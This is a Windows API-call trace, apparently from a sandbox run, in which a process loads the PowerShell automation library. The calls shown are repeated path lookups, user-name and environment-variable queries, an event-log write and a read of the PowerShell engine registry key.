	[0220.791] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.980] CoTaskMemAlloc (cb=0x804) returned 0x1b86daf0
	[0226.980] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b86daf0, nSize=0x27d618 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x27d618) returned 0x1
	[0226.980] CoTaskMemFree (pv=0x1b86daf0) 
	[0226.980] CoTaskMemAlloc (cb=0x204) returned 0xe5880
	[0226.980] GetUserNameW (in: lpBuffer=0xe5880, pcbBuffer=0x27d658 | out: lpBuffer="aETAdzjz", pcbBuffer=0x27d658) returned 1
	[0226.981] CoTaskMemFree (pv=0xe5880) 
	[0226.983] ReportEventW (hEventLog=0x1b9f0008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f61b68*="Available", lpRawData=0x2f618f8) returned 1
	[0227.028] CoTaskMemAlloc (cb=0x104) returned 0x18fd40
	[0227.028] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x18fd40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0227.028] CoTaskMemFree (pv=0x18fd40) 
	[0227.029] CoTaskMemAlloc (cb=0x104) returned 0x18fd40
	[0227.029] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x18fd40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0227.029] CoTaskMemFree (pv=0x18fd40) 
	[0227.031] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.031] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.031] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.035] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.035] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.035] CoTaskMemAlloc (cb=0x104) returned 0x18fd40
	[0227.035] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x18fd40, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0227.035] CoTaskMemFree (pv=0x18fd40) 
	[0227.035] CoTaskMemAlloc (cb=0x104) returned 0x18fd40
	[0227.035] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x18fd40, nSize=0x80 | out: lpBuffer="\\Users\\aETAdzjz") returned 0xf
	[0227.035] CoTaskMemFree (pv=0x18fd40) 
	[0227.035] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.035] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.036] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.036] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.036] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.036] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.036] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.037] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.037] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.037] GetCurrentProcessId () returned 0xc64
	[0227.038] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.038] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.038] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.039] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.039] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.039] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.040] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.040] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.040] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.040] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.040] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.040] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.041] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d638 | out: phkResult=0x27d638*=0x304) returned 0x0
	[0227.041] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x27d5bc, lpData=0x0, lpcbData=0x27d5b8*=0x0 | out: lpType=0x27d5bc*=0x1, lpData=0x0, lpcbData=0x27d5b8*=0x56) returned 0x0
	[0227.041] CoTaskMemAlloc (cb=0x5a) returned 0x1b84d410
	[0227.041] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x27d58c, lpData=0x1b84d410, lpcbData=0x27d588*=0x56 | out: lpType=0x27d58c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x27d588*=0x56) returned 0x0
	[0227.041] CoTaskMemFree (pv=0x1b84d410) 
	[0227.041] RegCloseKey (hKey=0x304) returned 0x0
	[0227.044] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.052] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.053] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.055] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.512] CoTaskMemAlloc (cb=0x104) returned 0x18fd40
	[0228.512] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x18fd40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0228.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.517] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.517] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.517] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.517] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.517] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
